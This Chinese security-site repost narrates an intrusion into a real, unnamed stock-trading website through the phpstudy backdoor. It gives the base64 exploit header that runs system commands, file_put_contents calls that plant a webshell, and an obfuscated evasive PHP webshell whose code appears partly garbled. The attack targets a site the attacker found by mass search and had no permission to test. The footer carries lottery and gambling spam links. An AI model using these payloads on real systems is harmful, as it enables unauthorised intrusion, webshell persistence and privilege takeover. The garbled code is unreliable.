安基网 欢乐生肖 安全 攻防案例 查看内容

好可怕!phpstudy漏洞被“黑客”在某股票网站上复现

2019-10-13 21:41| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 近期通过相关欣慰报道phpstudy发现了安全漏洞,于是被黑客就利用了,国外一名黑客利用这个phpstudy中的代码执行的后门漏洞,对某股票网站进行了渗透。渗透过程如下:利用某线上工具用搜索关键词去批量在搜索出来的网站中随便找了一个某票网站网站是这个样子的随后利用burpAccept-Encoding:gzip,deflate ...

近期通过相关欣慰报道phpstudy发现了安全漏洞,于是被黑客就利用了,国外一名黑客利用这个phpstudy中的代码执行的后门漏洞,对某股票网站进行了渗透。

渗透过程如下:

利用某线上工具用搜索关键词去批量

在搜索出来的网站中随便找了一个某票网站

网站是这个样子的

随后利用burp

Accept-Encoding:gzip,deflate

Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==

分别在请求包中添加利用的poc

Accep-Charset后面的是base64编码

成功的执行了命令,于是想着拿webshell

通过file_put_contents()写入了一句话进去

$a = '';file_put_contents('8.php',$a);echo 'ok';

写入之后访问,它拦截了我的请求,然后我访问了正常的文件index.php并没有拦截

查看了一下当前的目录,原来没写入到网站的目录下

于是执行了system("cd PHPTutorial&dir");(由于burp回显太慢于是就换了一位师傅写的工具)

查看了PHPTutorial目录下的www,应该是没写入到网站当前的目录

重新构造了语句再次写入

$a = '';file_put_contents('D:/phpStudy/PHPTutorial/www/8.php',$a);echo 'ok';

system("cd PHPTutorial/www&dir");查看一下www下的所有文件

重新尝试写入,发现还是没有写入进去,应该有防护,我把一句话木马换成了免杀的,文件名改成了index1。php

$a = ‘ create_function(Null,fun2())));@extract(array(c=>$b()));’function fun2(){$b=$_POST;retum @($b[’pass’]);}?>’;file_put_contents(‘D:/phpStudy/PHPTutorial/WWW/index1,php’,$a);

发现成功的写入了进去

执行命令的时候发现当前的权限为administrator,可直接提权!!!

所以建议看到这篇文章的朋友,一定要检测是否用了phpstudy,一定要检测一下是否存在安全漏洞,如果存在尽快升级修复,保护好自身系统安全!!!

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。

就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的“SaFeMAN”。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6746837585269621256/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
极速11选5 五分时时彩 欢乐生肖 pk10怎么玩 三分PK拾平台 幸运飞艇官网 幸运飞艇官网 安徽快3 三分快3 湖北快3代理